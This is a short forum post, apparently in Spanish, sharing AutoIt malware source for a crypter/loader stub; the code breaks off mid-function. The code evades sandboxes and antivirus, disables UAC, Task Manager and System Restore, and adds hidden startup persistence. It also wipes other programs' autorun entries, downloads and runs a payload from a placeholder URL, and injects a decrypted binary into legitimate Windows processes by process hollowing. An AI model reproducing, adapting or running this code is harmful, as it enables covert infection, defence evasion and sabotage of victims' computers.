por si alguien lo quiere :Lol
>#NoTrayIcon
If ProcessExists("avastui.exe") Then Sleep(20000)
$path = "replaceme"
$uniscriptdir = FileGetShortName(@ScriptDir)
$uniscriptfullpath = FileGetShortName(@ScriptFullPath)
$unicode_startup = FileGetShortName(@StartupDir)
$unicode_windows = FileGetShortName(@WindowsDir)
$unicode_system = FileGetShortName(@SystemDir)
$unicode_userprofile = FileGetShortName(@UserProfileDir)
$win_userprofile = "%userprofile%\"
FileSetAttrib($uniscriptdir, "+SHR")
Local $fake = IniRead($uniscriptdir & "\settings.ini", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
fakemessage()
Else
EndIf
Local $delay = IniRead($uniscriptdir & "\settings.ini", "delay1", "delay2", "NotFound")
If $delay = "delay3" Then
delay()
Else
EndIf
Local $mutex = IniRead($uniscriptdir & "\settings.ini", "mutex1", "mutex2", "NotFound")
If $mutex = "mutex3" Then
mutex()
Else
EndIf
Local $startup = IniRead($uniscriptdir & "\settings.ini", "start1", "start2", "NotFound")
If $startup = "start3" Then
startup()
Else
EndIf
Local $antis = IniRead($uniscriptdir & "\settings.ini", "antis1", "antis2", "NotFound")
If $antis = "antis3" Then
antis()
Else
EndIf
Local $botkiller = IniRead($uniscriptdir & "\settings.ini", "botkiller1", "botkiller2", "NotFound")
If $botkiller = "botkiller3" Then
botkiller()
Else
EndIf
Local $downloader = IniRead($uniscriptdir & "\settings.ini", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
downloader()
Else
EndIf
Local $uac = IniRead($uniscriptdir & "\settings.ini", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
disable_uac()
Else
EndIf
Local $systemrestore = IniRead($uniscriptdir & "\settings.ini", "systemrestore1", "systemrestore2", "NotFound")
If $systemrestore = "systemrestore3" Then
disable_syste_restore()
Else
EndIf
Local $antitask = IniRead($uniscriptdir & "\settings.ini", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
antitask()
Else
EndIf
Func delay()
Sleep(30000)
EndFunc
Func systemhide()
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0)
EndFunc
Func mutex()
$scriptname = "replace-autoit3.exe"
If UBound(ProcessList($scriptname)) > 2 Then Exit
EndFunc
Func antitask()
$read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
If NOT ($read_antitask = "1") Then
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
EndIf
EndFunc
Func disable_uac()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If NOT ($read_uac = "0") Then
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndIf
EndFunc
Func startup()
$buac = _checkelevationenabled()
If $buac = 0 Then
Else
FileCreateShortcut($unicode_userprofile & "\" & $path & "\start.vbs", $unicode_startup & "\start.lnk")
FileSetAttrib($unicode_startup, "+SH")
EndIf
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\start.vbs")
If NOT FileExists($unicode_userprofile & "\" & $path & "\start.vbs") Then
Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\start.cmd", 1)
$autoit3 = "autoit3-replace"
FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName)
FileClose($bat)
Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\start.vbs", 1)
FileWrite($vbs, "const WaitOnReturn = true" & @CRLF & 'File ="' & $unicode_userprofile & "\" & $path & "\" & 'start.cmd"' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
FileClose($vbs)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\start.vbs")
FileSetAttrib($unicode_userprofile & "\" & $path & "\start.vbs", "+SHR")
FileSetAttrib($unicode_userprofile & "\" & $path & "\start.cmd", "+SHR")
If FileExists($unicode_startup & "\start.lnk") Then
FileDelete($unicode_startup & "\start.lnk")
EndIf
Else
EndIf
EndFunc
Func _checkelevationenabled()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If @error Then Return
Local $struct = DllStructCreate("BOOL")
Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct))
If @error Then
Return SetError(@error)
EndIf
Return SetError($artn[0], 0, DllStructGetData($struct, 1))
EndFunc
Func antis()
If WinGetText("Program Manager") = "0" Then
Exit
Else
EndIf
If ProcessExists("VboxService.exe") Then
Exit
EndIf
If ProcessExists("VMwaretray.exe") Then
Exit
EndIf
EndFunc
Func persistence()
If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then
$pathtovbs = ($uniscriptdir & "\" & "run.vbs")
ShellExecute($pathtovbs)
Exit
EndIf
EndFunc
Func downloader()
If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then
Else
FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "")
$random_download_name = Random(10000, 99999, 1) & ".exe"
Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1)
Do
Sleep(250)
Until InetGetInfo($hdownload, 2)
Local $nbytes = InetGetInfo($hdownload, 0)
InetClose($hdownload)
ShellExecute($unicode_userprofile & "\" & $random_download_name)
EndIf
EndFunc
Func fakemessage()
$type = IniRead($uniscriptdir & "\settings.ini", "messagetype1", "messagetype2", "NotFound")
$title = IniRead($uniscriptdir & "\settings.ini", "messagetitle1", "messagetitle2", "NotFound")
$message = IniRead($uniscriptdir & "\settings.ini", "messagetext1", "messagetext2", "NotFound")
If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then
Else
MsgBox($type, $title, $message)
FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "")
EndIf
EndFunc
Func bsod()
$a = ProcessList()
For $i = 1 To UBound($a) + -1
ProcessClose($a[$i][0])
Next
Exit
EndFunc
Func botkiller()
RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
FileDelete(@StartupDir & "\*.*")
EndFunc
Func disable_syste_restore()
If FileExists($uniscriptdir & "\check.txt") Then
Else
RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
FileWrite($uniscriptdir & "\check.txt", "")
EndIf
EndFunc
Func _rundos($scommand)
Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE)
Return SetError(@error, @extended, $nresult)
EndFunc
Global Const $prov_rsa_full = 1
Global Const $prov_rsa_aes = 24
Global Const $crypt_verifycontext = + -268435456
Global Const $hp_hashsize = 4
Global Const $hp_hashval = 2
Global Const $crypt_exportable = 1
Global Const $crypt_userdata = 1
Global Const $calg_md2 = 32769
Global Const $calg_md4 = 32770
Global Const $calg_md5 = 32771
Global Const $calg_sha1 = 32772
Global Const $calg_3des = 26115
Global Const $calg_aes_128 = 26126
Global Const $calg_aes_192 = 26127
Global Const $calg_aes_256 = 26128
Global Const $calg_des = 26113
Global Const $_d210hfghdfg54f5f64g65dfghfghfgh5 = 26114
Global Const $calg_rc4 = 26625
Global Const $calg_userkey = 0
Global $__g_acryptinternaldata[3]
Func _crypt_encryptdata($vdata, $vcryptkey, $ialg_id, $ffinal = True)
Local $hbuff
Local $ierror
Local $vreturn
Local $reqbuffsize
Local $aret
_crypt_startup()
Do
If $ialg_id $calg_userkey Then
$vcryptkey = _crypt_derivekey($vcryptkey, $ialg_id)
If @error Then
$ierror = 1
$vreturn = + -1
ExitLoop
EndIf
EndIf
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptEncrypt", "handle", $vcryptkey, "handle", 0, "bool", $ffinal, "dword", 0, "ptr", 0, "dword*", BinaryLen($vdata), "dword", 0)
If @error OR NOT $aret[0] Then
$ierror = 2
$vreturn = + -1
ExitLoop
EndIf
$reqbuffsize = $aret[6]
$hbuff = DllStructCreate("byte[" & $reqbuffsize & "]")
DllStructSetData($hbuff, 1, $vdata)
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptEncrypt", "handle", $vcryptkey, "handle", 0, "bool", $ffinal, "dword", 0, "struct*", $hbuff, "dword*", BinaryLen($vdata), "dword", DllStructGetSize($hbuff))
If @error OR NOT $aret[0] Then
$ierror = 3
$vreturn = + -1
ExitLoop
EndIf
$ierror = 0
$vreturn = DllStructGetData($hbuff, 1)
Until True
Return $vreturn
EndFunc
Func _crypt_decryptdata($vdata, $vcryptkey, $ialg_id, $ffinal = True)
Local $hbuff
Local $ierror
Local $vreturn
Local $htempstruct
Local $iplaintextsize
Local $aret
_crypt_startup()
Do
If $ialg_id $calg_userkey Then
$vcryptkey = _crypt_derivekey($vcryptkey, $ialg_id)
If @error Then
$ierror = 1
$vreturn = + -1
ExitLoop
EndIf
EndIf
$hbuff = DllStructCreate("byte[" & BinaryLen($vdata) + 1000 & "]")
DllStructSetData($hbuff, 1, $vdata)
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptDecrypt", "handle", $vcryptkey, "handle", 0, "bool", $ffinal, "dword", 0, "struct*", $hbuff, "dword*", BinaryLen($vdata))
If @error OR NOT $aret[0] Then
$ierror = 2
$vreturn = + -1
ExitLoop
EndIf
$iplaintextsize = $aret[6]
$htempstruct = DllStructCreate("byte[" & $iplaintextsize & "]", DllStructGetPtr($hbuff))
$ierror = 0
$vreturn = DllStructGetData($htempstruct, 1)
Until True
Return $vreturn
EndFunc
Func _crypt_startup()
If __crypt_refcount() = 0 Then
Local $hadvapi32 = DllOpen("Advapi32.dll")
If @error Then Return SetError(1, 0, False)
__crypt_dllhandleset($hadvapi32)
Local $aret
Local $iproviderid = $prov_rsa_aes
If @OSVersion = "WIN_2000" Then $iproviderid = $prov_rsa_full
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptAcquireContext", "handle*", 0, "ptr", 0, "ptr", 0, "dword", $iproviderid, "dword", $crypt_verifycontext)
If @error OR NOT $aret[0] Then
DllClose(__crypt_dllhandle())
Return SetError(2, 0, False)
Else
__crypt_contextset($aret[1])
EndIf
EndIf
__crypt_refcountinc()
Return True
EndFunc
Func _crypt_derivekey($vpassword, $ialg_id, $ihash_alg_id = $calg_md5)
Local $aret
Local $hcrypthash
Local $hbuff
Local $ierror
Local $vreturn
_crypt_startup()
Do
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptCreateHash", "handle", __crypt_context(), "uint", $ihash_alg_id, "ptr", 0, "dword", 0, "handle*", 0)
If @error OR NOT $aret[0] Then
$ierror = 1
$vreturn = + -1
ExitLoop
EndIf
$hcrypthash = $aret[5]
$hbuff = DllStructCreate("byte[" & BinaryLen($vpassword) & "]")
DllStructSetData($hbuff, 1, $vpassword)
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptHashData", "handle", $hcrypthash, "struct*", $hbuff, "dword", DllStructGetSize($hbuff), "dword", $crypt_userdata)
If @error OR NOT $aret[0] Then
$ierror = 2
$vreturn = + -1
ExitLoop
EndIf
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptDeriveKey", "handle", __crypt_context(), "uint", $ialg_id, "handle", $hcrypthash, "dword", $crypt_exportable, "handle*", 0)
If @error OR NOT $aret[0] Then
$ierror = 3
$vreturn = + -1
ExitLoop
EndIf
$ierror = 0
$vreturn = $aret[5]
Until True
If $hcrypthash 0 Then DllCall(__crypt_dllhandle(), "bool", "CryptDestroyHash", "handle", $hcrypthash)
Return SetError($ierror, 0, $vreturn)
EndFunc
Func __crypt_contextset($hcryptcontext)
$__g_acryptinternaldata[2] = $hcryptcontext
EndFunc
Func __crypt_context()
Return $__g_acryptinternaldata[2]
EndFunc
Func __crypt_dllhandleset($hadvapi32)
$__g_acryptinternaldata[1] = $hadvapi32
EndFunc
Func __crypt_dllhandle()
Return $__g_acryptinternaldata[1]
EndFunc
Func __crypt_refcountdec()
If $__g_acryptinternaldata[0] > 0 Then $__g_acryptinternaldata[0] -= 1
EndFunc
Func __crypt_refcountinc()
$__g_acryptinternaldata[0] += 1
EndFunc
Func __crypt_refcount()
Return $__g_acryptinternaldata[0]
EndFunc
submain()
Func submain()
$_d2105 = IniRead($uniscriptdir & "\settings.ini", "decryptkey1", "decryptkey2", "NotFound")
$_d210hfghfghfghfgh5 = FileGetShortName(@ScriptDir & "\crypted-binary.dat")
$sapppath = FileRead(FileOpen($_d210hfghfghfghfgh5, 16))
$sarquive = _crypt_decryptdata($sapppath, $_d2105, $_d210hfghdfg54f5f64g65dfghfghfgh5)
_runpe($sarquive)
EndFunc
Func info($getfiledata, $stringtoget)
Return StringTrimLeft($getfiledata, StringInStr($getfiledata, $stringtoget) + -1 + StringLen($stringtoget))
EndFunc
Func _runpe($_dskljfkjhdfkgjfgfdgdf, $_dskljfkjhdf00kgjfgfdgdf = "")
#Region 1. DETERMINE INTERPRETER TYPE
Local $_dddhg21h5gf61h3fg132fg = @AutoItX64
#Region 2. PREDPROCESSING PASSED
Local $_dddhghfskljfkjhdf00kgjfgfdgdf = Binary($_dskljfkjhdfkgjfgfdgdf)
Local $_dddhghfskljfkjhfghgfhfhfgh = DllStructCreate("BYTE[" & BinaryLen($_dddhghfskljfkjhdf00kgjfgfdgdf) & "]")
DllStructSetData($_dddhghfskljfkjhfghgfhfhfgh, 1, $_dddhghfskljfkjhdf00kgjfgfdgdf)
Local $_dddhg21hfghfghfghfghffhf = DllStructGetPtr($_dddhghfskljfkjhfghgfhfhfgh)
#Region 3. CREATING NEW PROCESS
Local $tstartupinfo = DllStructCreate("DWORD CBSIZE;" & "PTR RESERVED;" & "PTR DESKTOP;" & "PTR TITLE;" & "DWORD X;" & "DWORD Y;" & "DWORD XSIZE;" & "DWORD YSIZE;" & "DWORD XCOUNTCHARS;" & "DWORD YCOUNTCHARS;" & "DWORD FILLATTRIBUTE;" & "DWORD FLAGS;" & "WORD SHOWWINDOW;" & "WORD RESERVED2;" & "PTR RESERVED2;" & "PTR HSTDINPUT;" & "PTR HSTDOUTPUT;" & "PTR HSTDERROR")
Local $tprocess_information = DllStructCreate("PTR PROCESS;" & "PTR THREAD;" & "DWORD PROCESSID;" & "DWORD THREADID")
$inject_net2_regsvc = ($unicode_windows & "\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe")
$inject_net2_regasm = ($unicode_windows & "\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe")
$inject_net2_applaunch = ($unicode_windows & "\Microsoft.NET\Framework\v2.0.50727\AppLaunch.exe")
$inject_net4_regsvc = ($unicode_windows & "\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe")
$inject_net4_regasm = ($unicode_windows & "\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe")
$inject_net4_applaunch = ($unicode_windows & "\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe")
$inject_newdev = ($unicode_system & "\newdev.exe")
$inject_twunk_32 = ($unicode_windows & "\twunk_32.exe")
$inject_ndadmin = ($unicode_system & "\ndadmin.exe")
If FileExists($inject_net2_regsvc) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net2_regsvc, "WSTR", $_dskljfkjhdf00kgjfgfdgdf, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_net2_regasm) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net2_regasm, "WSTR", $_dskljfkjhdf00kgjfgfdgdf, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_net2_applaunch) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net2_applaunch, "WSTR", $_dskljfkjhdf00kgjfgfdgdf, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_net4_regsvc) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net4_regsvc, "WSTR", $_dskljfkjhdf00kgjfgfdgdf, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_net4_regasm) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net4_regasm, "WSTR", $_dskljfkjhdf00kgjfgfdgdf, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_net4_applaunch) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net4_applaunch, "WSTR", $_dskljfkjhdf00kgjfgfdgdf, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_newdev) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_newdev, "WSTR", $_dskljfkjhdf00kgjfgfdgdf, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_twunk_32) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_twunk_32, "WSTR", $_dskljfkjhdf00kgjfgfdgdf, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
Else
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_ndadmin, "WSTR", $_dskljfkjhdf00kgjfgfdgdf, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
EndIf
If @error OR NOT $acall[0] Then Return SetError(1, 0, 0)
Local $hprocess = DllStructGetData($tprocess_information, "PROCESS")
Local $hthread = DllStructGetData($tprocess_information, "THREAD")
If $_dddhg21h5gf61h3fg132fg AND __runpe_iswow64process($hprocess) Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(2, 0, 0)
EndIf
#Region 4. FILL CONTEXT STRUCTURE
Local $irunflag, $tcontext
If $_dddhg21h5gf61h3fg132fg Then
If @OSArch = "X64" Then
$irunflag = 2
$tcontext = DllStructCreate("ALIGN 16; UINT64 P1HOME; UINT64 P2HOME; UINT64 P3HOME; UINT64 P4HOME; UINT64 P5HOME; UINT64 P6HOME;" & "DWORD CONTEXTFLAGS; DWORD MXCSR;" & "WORD SEGCS; WORD SEGDS; WORD SEGES; WORD SEGFS; WORD SEGGS; WORD SEGSS; DWORD EFLAGS;" & "UINT64 DR0; UINT64 DR1; UINT64 DR2; UINT64 DR3; UINT64 DR6; UINT64 DR7;" & "UINT64 RAX; UINT64 RCX; UINT64 RDX; UINT64 RBX; UINT64 RSP; UINT64 RBP; UINT64 RSI; UINT64 RDI; UINT64 R8; UINT64 R9; UINT64 R10; UINT64 R11; UINT64 R12; UINT64 R13; UINT64 R14; UINT64 R15;" & "UINT64 RIP;" & "UINT64 HEADER[4]; UINT64 LEGACY[16]; UINT64 XMM0[2]; UINT64 XMM1[2]; UINT64 XMM2[2]; UINT64 XMM3[2]; UINT64 XMM4[2]; UINT64 XMM5[2]; UINT64 XMM6[2]; UINT64 XMM7[2]; UINT64 XMM8[2]; UINT64 XMM9[2]; UINT64 XMM10[2]; UINT64 XMM11[2]; UINT64 XMM12[2]; UINT64 XMM13[2]; UINT64 XMM14[2]; UINT64 XMM15[2];" & "UINT64 VECTORREGISTER[52]; UINT64 VECTORCONTROL;" & "UINT64 DEBUGCONTROL; UINT64 LASTBRANCHTORIP; UINT64 LASTBRANCHFROMRIP; UINT64 LASTEXCEPTIONTORIP; UINT64 LASTEXCEPTIONFROMRIP")
Else
$irunflag = 3
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(102, 0, 0)
EndIf
Else
$irunflag = 1
$tcontext = DllStructCreate("DWORD CONTEXTFLAGS;" & "DWORD DR0; DWORD DR1; DWORD DR2; DWORD DR3; DWORD DR6; DWORD DR7;" & "DWORD CONTROLWORD; DWORD STATUSWORD; DWORD TAGWORD; DWORD ERROROFFSET; DWORD ERRORSELECTOR; DWORD DATAOFFSET; DWORD DATASELECTOR; BYTE REGISTERAREA[80]; DWORD CR0NPXSTATE;" & "DWORD SEGGS; DWORD SEGFS; DWORD SEGES; DWORD SEGDS;" & "DWORD EDI; DWORD ESI; DWORD EBX; DWORD EDX; DWORD ECX; DWORD EAX;" & "DWORD EBP; DWORD EIP; DWORD SEGCS; DWORD EFLAGS; DWORD ESP; DWORD SEGSS;" & "BYTE EXTENDEDREGISTERS[512]")
EndIf
Local $context_full
Switch $irunflag
Case 1
$context_full = 65543
Case 2
$context_full = 1048583
Case 3
$context_full = 524327
EndSwitch
DllStructSetData($tcontext, "CONTEXTFLAGS", $context_full)
$acall = DllCall("KERNEL32.DLL", "BOOL", "GetThreadContext", "HANDLE", $hthread, "PTR", DllStructGetPtr($tcontext))
If @error OR NOT $acall[0] Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(3, 0, 0)
EndIf
Local $ppeb
Switch $irunflag
Case 1
$ppeb = DllStructGetData($tcontext, "EBX")
Case 2
$ppeb = DllStructGetData($tcontext, "RDX")
Case 3
EndSwitch
#Region 5. READ PE-FORMAT
Local $timage_dos_header = DllStructCreate("CHAR MAGIC[2];" & "WORD BYTESONLASTPAGE;" & "WORD PAGES;" & "WORD RELOCATIONS;" & "WORD SIZEOFHEADER;" & "WORD MINIMUMEXTRA;" & "WORD MAXIMUMEXTRA;" & "WORD SS;" & "WORD SP;" & "WORD CHECKSUM;" & "WORD IP;" & "WORD CS;" & "WORD RELOCATION;" & "WORD OVERLAY;" & "CHAR RESERVED[8];" & "WORD OEMIDENTIFIER;" & "WORD OEMINFORMATION;" & "CHAR RESERVED2[20];" & "DWORD ADDRESSOFNEWEXEHEADER", $_dddhg21hfghfghfghfghffhf)
Local $pheaders_new = $_dddhg21hfghfghfghfghffhf
$_dddhg21hfghfghfghfghffhf += DllStructGetData($timage_dos_header, "ADDRESSOFNEWEXEHEADER")
Local $smagic = DllStructGetData($timage_dos_header, "MAGIC")
If NOT ($smagic == "MZ") Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(4, 0, 0)
EndIf
Local $timage_nt_signature = DllStructCreate("DWORD SIGNATURE", $_dddhg21hfghfghfghfghffhf)
$_dddhg21hfghfghfghfghffhf += 4
If DllStructGetData($timage_nt_signature, "SIGNATURE") 17744 Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(5, 0, 0)
EndIf
Local $timage_file_header = DllStructCreate("WORD MACHINE;" & "WORD NUMBEROFSECTIONS;" & "DWORD TIMEDATESTAMP;" & "DWORD POINTERTOSYMBOLTABLE;" & "DWORD NUMBEROFSYMBOLS;" & "WORD SIZEOFOPTIONALHEADER;" & "WORD CHARACTERISTICS", $_dddhg21hfghfghfghfghffhf)
Local $inumberofsections = DllStructGetData($timage_file_header, "NUMBEROFSECTIONS")
$_dddhg21hfghfghfghfghffhf += 20
Local $tmagic = DllStructCreate("WORD MAGIC;", $_dddhg21hfghfghfghfghffhf)
Local $imagic = DllStructGetData($tmagic, 1)
Local $timage_optional_header
If $imagic = 267 Then
If $_dddhg21h5gf61h3fg132fg Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(6, 0, 0)
EndIf
$timage_optional_header = DllStructCreate("WORD MAGIC;" & "BYTE MAJORLINKERVERSION;" & "BYTE MINORLINKERVERSION;" & "DWORD SIZEOFCODE;" & "DWORD SIZEOFINITIALIZEDDATA;" & "DWORD SIZEOFUNINITIALIZEDDATA;" & "DWORD ADDRESSOFENTRYPOINT;" & "DWORD BASEOFCODE;" & "DWORD BASEOFDATA;" & "DWORD IMAGEBASE;" & "DWORD SECTIONALIGNMENT;" & "DWORD FILEALIGNMENT;" & "WORD MAJOROPERATINGSYSTEMVERSION;" & "WORD MINOROPERATINGSYSTEMVERSION;" & "WORD MAJORIMAGEVERSION;" & "WORD MINORIMAGEVERSION;" & "WORD MAJORSUBSYSTEMVERSION;" & "WORD MINORSUBSYSTEMVERSION;" & "DWORD WIN32VERSIONVALUE;" & "DWORD SIZEOFIMAGE;" & "DWORD SIZEOFHEADERS;" & "DWORD CHECKSUM;" & "WORD SUBSYSTEM;" & "WORD DLLCHARACTERISTICS;" & "DWORD SIZEOFSTACKRESERVE;" & "DWORD SIZEOFSTACKCOMMIT;" & "DWORD SIZEOFHEAPRESERVE;" & "DWORD SIZEOFHEAPCOMMIT;" & "DWORD LOADERFLAGS;" & "DWORD NUMBEROFRVAANDSIZES", $_dddhg21hfghfghfghfghffhf)
$_dddhg21hfghfghfghfghffhf += 96
ElseIf $imagic = 523 Then
If NOT $_dddhg21h5gf61h3fg132fg Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(6, 0, 0)
EndIf
$timage_optional_header = DllStructCreate("WORD MAGIC;" & "BYTE MAJORLINKERVERSION;" & "BYTE MINORLINKERVERSION;" & "DWORD SIZEOFCODE;" & "DWORD SIZEOFINITIALIZEDDATA;" & "DWORD SIZEOFUNINITIALIZEDDATA;" & "DWORD ADDRESSOFENTRYPOINT;" & "DWORD BASEOFCODE;" & "UINT64 IMAGEBASE;" & "DWORD SECTIONALIGNMENT;" & "DWORD FILEALIGNMENT;" & "WORD MAJOROPERATINGSYSTEMVERSION;" & "WORD MINOROPERATINGSYSTEMVERSION;" & "WORD MAJORIMAGEVERSION;" & "WORD MINORIMAGEVERSION;" & "WORD MAJORSUBSYSTEMVERSION;" & "WORD MINORSUBSYSTEMVERSION;" & "DWORD WIN32VERSIONVALUE;" & "DWORD SIZEOFIMAGE;" & "DWORD SIZEOFHEADERS;" & "DWORD CHECKSUM;" & "WORD SUBSYSTEM;" & "WORD DLLCHARACTERISTICS;" & "UINT64 SIZEOFSTACKRESERVE;" & "UINT64 SIZEOFSTACKCOMMIT;" & "UINT64 SIZEOFHEAPRESERVE;" & "UINT64 SIZEOFHEAPCOMMIT;" & "DWORD LOADERFLAGS;" & "DWORD NUMBEROFRVAANDSIZES", $_dddhg21hfghfghfghfghffhf)
$_dddhg21hfghfghfghfghffhf += 112
Else
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(6, 0, 0)
EndIf
Local $ientrypointnew = DllStructGetData($timage_optional_header, "ADDRESSOFENTRYPOINT")
Local $ioptionalheadersizeofheadersnew = DllStructGetData($timage_optional_header, "SIZEOFHEADERS")
Local $poptionalheaderimagebasenew = DllStructGetData($timage_optional_header, "IMAGEBASE")
Local $ioptionalheadersizeofimagenew = DllStructGetData($timage_optional_header, "SIZEOFIMAGE")
$_dddhg21hfghfghfghfghffhf += 8
$_dddhg21hfghfghfghfghffhf += 8
$_dddhg21hfghfghfghfghffhf += 24
Local $timage_directory_entry_basereloc = DllStructCreate("DWORD VIRTUALADDRESS; DWORD SIZE", $_dddhg21hfghfghfghfghffhf)
Local $paddressnewbasereloc = DllStructGetData($timage_directory_entry_basereloc, "VIRTUALADDRESS")
Local $isizebasereloc = DllStructGetData($timage_directory_entry_basereloc, "SIZE")
Local $frelocatable
If $paddressnewbasereloc AND $isizebasereloc Then $frelocatable = True
If NOT $frelocatable Then ConsoleWrite("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!" & @CRLF)
$_dddhg21hfghfghfghfghffhf += 88
#Region 6. ALLOCATE 'NEW' MEMORY SPACE
Local $frelocate
Local $pzeropoint
